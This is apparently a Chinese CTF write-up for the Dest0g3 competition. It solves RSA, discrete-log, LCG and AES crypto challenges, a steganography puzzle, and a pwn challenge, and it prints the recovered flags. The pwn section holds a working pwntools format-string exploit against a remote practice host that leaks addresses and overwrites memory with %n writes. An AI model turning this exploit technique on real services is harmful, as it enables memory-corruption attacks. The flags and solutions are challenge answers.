题目难度:萌新
题目脚本
from Crypto.Util.number import bytes_to_long, getPrime
from gmpy2 import next_prime
p = getPrime(1024)
q = next_prime(p)
n = p*q
flag = open('flag.txt', 'rb').read()
m = bytes_to_long(flag)
e = 65537
c = pow(m, e, n)
print(n)
print(c)
'''
27272410937497615429184017335437367466288981498585803398561456300019447702001403165885200936510173980380489828828523983388730026101865884520679872671569532101708469344562155718974222196684544003071765625134489632331414011555536130289106822732544904502428727133498239161324625698270381715640332111381465813621908465311076678337695819124178638737015840941223342176563458181918865641701282965455705790456658431641632470787689389714643528968037519265144919465402561959014798324908010947632834281698638848683632113623788303921939908168450492197671761167009855312820364427648296494571794298105543758141065915257674305081267
14181751948841206148995320731138166924841307246014981115736748934451763670304308496261846056687977917728671991049712129745906089287169170294259856601300717330153987080212591008738712344004443623518040786009771108879196701679833782022875324499201475522241396314392429412747392203809125245393462952461525539673218721341853515099201642769577031724762640317081252046606564108211626446676911167979492329012381654087618979631924439276786566078856385835786995011067720124277812004808431347148593882791476391944410064371926611180496847010107167486521927340045188960373155894717498700488982910217850877130989318706580155251854
'''
解题步骤
题目p、q均为1024位随机素数,无法通过N值使用在线工具或factor等工具直接爆破p、q,所以本题采用RsaCtfTool工具,由公钥推算私钥,最后通过私钥解密。
1.使用RSA-CTF-TOOL生成公钥,用openssl验证
Python RsaCtfTool.py --createpub -n 123456 -e 65537
┌──(rootkali)-[/crypto/RsaCtfTool]
└─# openssl rsa -pubin -in pubaaa.key -text -modulus 1 ⨯ 1 ⚙
RSA Public-Key: (2048 bit)
Modulus:
00:d8:0a:03:0d:98:de:84:0a:30:b5:3d:e5:d3:bc:
5a:f6:01:42:f6:19:4c:5e:33:6b:14:8b:83:5b:9f:
02:82:19:bd:02:81:1c:10:20:e0:a7:86:1e:5f:32:
d4:cb:5f:34:5f:35:52:f1:12:2a:36:ce:8b:02:69:
d1:1b:06:e2:00:2f:22:b7:ce:17:fd:a1:cd:f1:36:
01:0b:58:81:bb:bb:98:b2:3d:66:f5:ed:77:e9:1b:
33:ce:91:92:d3:a9:93:a4:33:d9:1c:eb:bf:d1:d8:
4c:f8:fe:61:81:0c:f1:6e:7a:7a:de:99:f8:cb:0e:
e9:80:fe:66:97:fe:35:d4:5f:09:97:48:c7:af:66:
c4:24:d8:e5:c5:2c:e5:31:9f:57:ce:5c:67:eb:dd:
bf:d8:62:86:6c:61:69:4a:20:d5:42:07:e4:55:12:
e2:e8:d2:21:dd:fa:e8:5b:c4:81:82:5d:e0:3c:75:
87:53:bd:2c:fc:96:c7:6f:79:d3:7b:c3:b9:53:10:
e0:65:2c:81:31:5d:c2:a1:74:19:03:cf:7a:92:5f:
e9:66:af:99:e4:cd:74:c0:97:f5:4d:e4:fc:8c:0b:
62:1c:39:65:f5:1f:1c:62:41:a4:c3:90:a8:09:f0:
35:16:df:79:90:94:bf:59:6d:0b:05:56:3d:97:6b:
8f:b3
Exponent: 65537 (0x10001)
Modulus=D80A030D98DE840A30B53DE5D3BC5AF60142F6194C5E336B148B835B9F028219BD02811C1020E0A7861E5F32D4CB5F345F3552F1122A36CE8B0269D11B06E2002F22B7CE17FDA1CDF136010B5881BBBB98B23D66F5ED77E91B33CE9192D3A993A433D91CEBBFD1D84CF8FE61810CF16E7A7ADE99F8CB0EE980FE6697FE35D45F099748C7AF66C424D8E5C52CE5319F57CE5C67EBDDBFD862866C61694A20D54207E45512E2E8D221DDFAE85BC481825DE03C758753BD2CFC96C76F79D37BC3B95310E0652C81315DC2A1741903CF7A925FE966AF99E4CD74C097F54DE4FC8C0B621C3965F51F1C6241A4C390A809F03516DF799094BF596D0B05563D976B8FB3
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2AoDDZjehAowtT3l07xa
9gFC9hlMXjNrFIuDW58Cghm9AoEcECDgp4YeXzLUy180XzVS8RIqNs6LAmnRGwbi
AC8it84X/aHN8TYBC1iBu7uYsj1m9e136RszzpGS06mTpDPZHOu/0dhM+P5hgQzx
bnp63pn4yw7pgP5ml/411F8Jl0jHr2bEJNjlxSzlMZ9Xzlxn692/2GKGbGFpSiDV
QgfkVRLi6NIh3froW8SBgl3gPHWHU70s/JbHb3nTe8O5UxDgZSyBMV3CoXQZA896
kl/pZq+Z5M10wJf1TeT8jAtiHDll9R8cYkGkw5CoCfA1Ft95kJS/WW0LBVY9l2uP
swIDAQAB
-----END PUBLIC KEY-----
2.使用RSA-CTF-TOOL公钥转为私钥
python3 RsaCtfTool.py --publickey pubaaa.key --private 1 ⨯
Private key :
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2AoDDZjehAowtT3l07xa9gFC9hlMXjNrFIuDW58Cghm9AoEc
ECDgp4YeXzLUy180XzVS8RIqNs6LAmnRGwbiAC8it84X/aHN8TYBC1iBu7uYsj1m
9e136RszzpGS06mTpDPZHOu/0dhM+P5hgQzxbnp63pn4yw7pgP5ml/411F8Jl0jH
r2bEJNjlxSzlMZ9Xzlxn692/2GKGbGFpSiDVQgfkVRLi6NIh3froW8SBgl3gPHWH
U70s/JbHb3nTe8O5UxDgZSyBMV3CoXQZA896kl/pZq+Z5M10wJf1TeT8jAtiHDll
9R8cYkGkw5CoCfA1Ft95kJS/WW0LBVY9l2uPswIDAQABAoIBABi6BKFwxr8cH3kP
DZgPbeXMPSrHuHrrrazbTvyUlYfohD6eImUiLjReYGmK+toQGoFvLAAVkSlWuIhd
LibGweU9f97DwvEvrM+X28S9q5OeJBr6diddt6TBjUtuU/zP4usfWBE8VmchN6Yk
D2ri3VtEv31s6BHtsgImm/13hhe5Vx03v/Wzx05OeEIFC9YQvSUmhO/eyVNh/fBx
As6V5d6AafaZKu9jCU+p2dLKUutuJh/ir/0ZGByURxUHGiAn4pBNuVcwG8z3/nl7
Dy074dNXkbF0zOtszDAwIJx/BYjwsMo1FNgLCXCM7VfuDPXS7FKXWYZQmhPTDJZ9
Qe/eK/ECgYEA6ywcBoJ8UPAYCeWI3em4gvNNSvTytfm4FTLdEZ5UJ4Zj38DjldOY
mHsr1/X6dIg9AbGeLwCSfoGh6Wl6PWdvExgsbuKZNGThDxdLxH2e/i2Np+SvTORP
mGa1Jn86Q/tybjc0kkOh7PDBTBIRareZ598o882/vGUxprEEmUPF+gsCgYEA6ywc
BoJ8UPAYCeWI3em4gvNNSvTytfm4FTLdEZ5UJ4Zj38DjldOYmHsr1/X6dIg9AbGe
LwCSfoGh6Wl6PWdvExgsbuKZNGThDxdLxH2e/i2Np+SvTORPmGa1Jn86Q/tybjc0
kkOh7PDBTBIRareZ598o882/vGUxprEEmUPF8fkCgYEA2Z4urONwcGFMjVPnLBrM
D/le697w/e4AJzWzFkuh6hVVNEfFEe8FBQztjGFlixJLCdc33pyz8va4QkrFwC6H
vW6gJ1ful2pGTPWsuj3Ys7Kpo9RdV1TqRse8F8yhuSjkQhM5xaNqItzCskcB8PPH
Kqb5uWoKZCZsJKkn7T+m4vMCgYBbS7pthIaCXVLXtLYXgD5TB+T/rmvy3UjrYd2U
k2SUG4X2PUmcxpI8z8RLiIB8cM9OMwf3sz8rwWN726jK4barMP0+5tUXE/qTAzY0
x5fLkR+nCA5NyWxk+6pjkYyrC5h21ROhnIPmGejQgUslpLUo4OdjDoLavmYyEhJ4
9WiI8QKBgAzc3hglnndqj5CGm0/K/JXoYcfBUO4ydb89JN+hsJdZwFIABIR6Oclk
qU5aJ5iWsU7GrdM8n63zgyfnKcCxxQWhCxqiU3g1mFQ3q8utKMn/w/f1lZuAOGVk
iIuF1/Ehs9umlPdlV0rKgQgAfhpIPtCV3uzexPkUpuXNdhdAjBFF
-----END RSA PRIVATE KEY-----
┌──(rootkali)-[/crypto/RsaCtfTool]
3.由于数据过长,openssl无法解密,使用在线工具解密
RSA加密解密 - 爱资料工具
题目脚本
from Crypto.Util.number import *
flag = open('flag.txt', 'rb').read()
x = bytes_to_long(flag)
g = 19
p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839870641607412102746854257629226877248337002993023452385472058106944014653401647033456174126976474875859099023703472904735779212010820524934972736276889281087909166017427905825553503050645575935980580803899122224368875197728677516907272452047278523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736573246893588079033524476111268686138924892091575797329915240849862827621736832883215569687974368499436632617425922744658912248644475097139485785819369867604176912652851123185884810544172785948158330991257118563772736929105360124222843930130347670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501371279295621820181402191463184275851324378938021156631501330660825566054528793444353
h = pow(g, x, p)
print(h)
'''
h=199533304296625406955683944856330940256037859126142372412254741689676902594083385071807594584589647225039650850524873289407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007735707550914742749524818990843357217489433410647994417860374972468061110200554531819987204852047401539211300639165417994955609002932104372266583569468915607415521035920169948704261625320990186754910551780290421057403512785617970138903967874651050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326538607106089620201074331099713506536192957054173076913374098400489398228161089007898192779738439912595619813699711049380213926849110877231503068464392648816891183318112570732792516076618174144968844351282497993164926346337121313644001762196098432060141494704659769545012678386821212213326455045335220435963683095439867976162
'''
解题步骤
题目给出h,g,p,其中h = pow(g, x, p),求x的值,计划用百度找的dlp算法,由于数据过大,没解出来,所以采用sage工具解题。
Sage工具解题:
root@VM-24-9-ubuntu:/crypto# sage
┌────────────────────────────────────────────────────────────────────┐
│ SageMath version 9.4, Release Date: 2021-08-22 │
│ Using Python 3.9.5. Type "help()" for help. │
└────────────────────────────────────────────────────────────────────┘
sage:
/crypto/SageMath/local/lib/python3.9/site-packages/prompt_toolkit/renderer.py:514: DeprecationWarning: The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8, and scheduled for removal in Python 3.11.
await wait(coroutines, return_when=FIRST_COMPLETED)
sage: g = 19
sage: p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839
....: 8706416074121027468542576292268772483370029930234523854720581069440146534016470334561741269764748758590990237034729047357
....: 7921201082052493497273627688928108790916601742790582555350305064557593598058080389912222436887519772867751690727245204727
....: 8523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736
....: 5732468935880790335244761112686861389248920915757973299152408498628276217368328832155696879743684994366326174259227446589
....: 1224864447509713948578581936986760417691265285112318588481054417278594815833099125711856377273692910536012422284393013034
....: 7670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501
....: 371279295621820181402191463184275851324378938021156631501330660825566054528793444353
sage: h=19953330429662540695568394485633094025603785912614237241225474168967690259408338507180759458458964722503965085052487328
....: 9407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007
....: 7357075509147427495248189908433572174894334106479944178603749724680611102005545318199872048520474015392113006391654179949
....: 5560900293210437226658356946891560741552103592016994870426162532099018675491055178029042105740351278561797013890396787465
....: 1050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326
....: 5386071060896202010743310997135065361929570541730769133740984004893982281610890078981927797384399125956198136997110493802
....: 1392684911087723150306846439264881689118331811257073279251607661817414496884435128249799316492634633712131364400176219609
....: 8432060141494704659769545012678386821212213326455045335220435963683095439867976162
sage: x =discrete_log(h,mod(g,p))
sage: print(x)
627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133
sage:
libnum数字转字符直接解
import libnum
print(libnum.n2s(627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133
))
b'Dest0g3{07ed2a6f-182f-a05d-c81e-1318af820a78}'
题目采用Lcg线性同余算法
创建a,b,m三个随机数,32位随机seed,解密之前先爆破seed。
题目脚本
from Crypto.Util.number import *
f = open('flag.txt', 'r')
flag = f.read()
f.close()
assert flag[:8] == "Dest0g3{"
class LCG:
def __init__(self):
self.a = getRandomNBitInteger(32)
self.b = getRandomNBitInteger(32)
self.m = getPrime(32)
self.seed = getRandomNBitInteger(32)
def next(self):
self.seed = (self.a * self.seed + self.b) % self.m
return self.seed >> 16
def output(self):
print("a = {}\nb = {}\nm = {}".format(self.a, self.b, self.m))
print("state1 = {}".format(self.next()))
print("state2 = {}".format(self.next()))
lcg = LCG()
lcg.output()
c = b''.join([long_to_bytes(ord(flag[i]) ^ (lcg.next() % 10))
for i in range(len(flag))])
print(bytes_to_long(c))
'''
a = 3939333498
b = 3662432446
m = 2271373817
state1 = 17362
state2 = 20624
600017039001091357643174067454938198067935635401496485588306838343558125283178792619821966678282131419050878
'''
解题代码
爆破随机seed, seed=104984523
a = 3939333498
b = 3662432446
m = 2271373817
seed=10000
while True:
seed += 1
tmp = (a * seed + b) % m
if tmp >> 16 == 17362:
print(b'find ' + str(seed).encode())
if (a * tmp + b) % m >> 16 == 20624:
print(b'success ' + str(seed).encode())
input()
由于数据较小,爆破成功
解密脚本:
利用刚才的seed直接解密
from Crypto.Util.number import *
import libnum
aaa = b'Dest0g3{'
flag='Agtp6b3zd15d3017-d71f-e<83$a6kj/b`f03325>b23~'
#104984523
class LCG:
def __init__(self):
'''self.a = getRandomNBitInteger(32)
self.b = getRandomNBitInteger(32)
self.m = getPrime(32)'''
self.seed = getRandomNBitInteger(32)
self.a = 3939333498
self.b = 3662432446
self.m = 2271373817
self.seed=104984523
def next(self):
self.seed = (self.a * self.seed + self.b) % self.m
return self.seed >> 16
def output(self):
print("a = {}\nb = {}\nm = {}".format(self.a, self.b, self.m))
print("state1 = {}".format(self.next()))
print("state2 = {}".format(self.next()))
lcg = LCG()
lcg.output()
c = b''.join([long_to_bytes(ord(flag[i]) ^ (lcg.next() % 10))
for i in range(len(flag))])
print(libnum.n2s(bytes_to_long(c)))
b'Dest0g3{f21c7180-c35e-f912-e4bc-bfd235759a25}'
题目脚本
from Crypto.Cipher import AES
import os
iv = os.urandom(16)
key = os.urandom(16)
my_aes = AES.new(key, AES.MODE_CBC, iv)
flag = open('flag.txt', 'rb').read()
flag += (16 - len(flag) % 16) * b'\x00'
c = my_aes.encrypt(flag)
print(c)
print(iv)
print(key)
'''
b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
'''
解题代码
题目较为简单,直接解
from Crypto.Cipher import AES
import os
iv = b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
key = b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
my_aes = AES.new(key, AES.MODE_CBC, iv)
flag = b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
c = my_aes.decrypt(flag)
print(c)
b'Dest0g3{d0e5fa76-e50f-76f6-9cf1-b6c2d576b6f4}\x00\x00\x00'
修改js文件,发现即使分数够了也不能获得flag。。。
查看源码 发现
Base64解密拿到一部分flag:4ee7-b673-971d81f8b177}
继续查看源码发现favicon.png,图片分离发现音频文件和加密的压缩包
分析音频,发现音频隐写采用拨号隐写和SSTV隐写
得到手机号码 13872908594
Kali linux 下使用qsstv 和 pavucontrol分析音频如下
扫描音频获得图片 password: md5(phone number)
用获取到的密码解开压缩包,拿到图片如下
通过gaps工具自动拼图,如下
gaps --image=part_flag.jpg --size=64 --save
获得拼图文件如下
组合起来base64解密即可
加上刚才的flag字符串拼到一起
Dest0g3{ed4d114f-9ee4-4ee7-b673-971d81f8b177}
题目主函数如下
对format位置存入变量,printf输出format指向的数据,由于printf函数未提供格式化字符串输出,因此可泄露栈地址、libc地址、bss段地址等。
查看format、dword_4010均存储在bss段上,如下图
本题主要考察bss段上的格式化字符串
1.首先利用printf函数泄露栈地址、bss段上目标变量的位置、栈上指向bss段附近的指针。
2.将泄露的栈地址指向另一个栈地址,此处栈地址为指向bss段附近的指针,如下图。
3.将栈指针指向bss段的目标位置,即dword_4010,如下。
4.bss段dword_4010变量覆盖即可。
脚本如下:(计划用gadget打ret,由于题目没给libc,只能用常规操作)
from pwn import *
io=remote('node4.buuoj.cn',27720)
#io=process('./pwn')
context.log_level='debug'
gadget=0xcad1a
re=b'What about your love to Dest0g3?\n'
io.recvuntil(re)
payload=b'aaaaaaaa%1$p%9$p%10$p%16$p'
#payload=b'aaaaaaaa%1$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p'
io.sendline(payload)
#print(io.recv())
#gdb.attach(io)
io.recvuntil(b'aaaaaaaa0x')
aaaa_addr=io.recvuntil(b'0x')[:-2]
dest_addr=int(aaaa_addr,16)-0x50
bbbb_addr=io.recvuntil(b'0x')[:-2]
libc_addr=int(bbbb_addr,16)
cccc_addr=io.recvuntil(b'0x')[:-2]
stack_addr=int(cccc_addr,16)
stack_dest_addr=int(io.recvuntil(b'\n')[:-1],16)
print(b'dest_addr '+str(dest_addr).encode()+b' '+str(hex(dest_addr)).encode())
print(b'libc_addr '+str(libc_addr).encode()+b' '+str(hex(libc_addr)).encode())
print(b'stack_addr '+str(stack_addr).encode()+b' '+str(hex(stack_addr)).encode())
print(b'stack_dest_addr '+str(stack_dest_addr).encode()+b' '+str(hex(stack_dest_addr)).encode())
io.recvuntil(re)
#gdb.attach(io)
#payload2=b'%'+str(dest_addr).encode()+b'c%1$hhn'
payload2=b'%'+str((stack_addr&0xffff)-32).encode()+b'c%10$hn\x00'
#payload2=b'aaaaaaaa%10$n'
#print(payload2)
io.sendline(payload2)
print(io.recvuntil(re))
#gdb.attach(io)
gadget=dest_addr&0xffffff
payload3 = b'%'+str(gadget & 0xffff).encode()+b'c%39$hnxxxx\x00'
#payload3 =b'aaaaaaaa%39$p'
io.sendline(payload3)
print(io.recvuntil(re))
#gdb.attach(io)
num=1314520
payload4 = b'%'+str(num).encode()+b'c%35$n\x00'
print(payload4)
io.sendline(payload4)
#gdb.attach(io)
print(io.recvuntil(re))
#gdb.attach(io)
payload5 = b'%'+str((gadget>>16) & 0xffff).encode()+b'c%39$hhnxxxx\x00'
io.sendline(payload5)
print(io.recvuntil(re))
payload6=b'aaaa'
io.sendline(payload6)
#print(io.recvuntil(re))
#gdb.attach(io)
#print(aaaa_addr)
#
io.interactive()
Dest0g3{3e06a44c-7cc7-4edd-9e34-ae693ea69a90}
其他的题目比较简单,就不放了。。。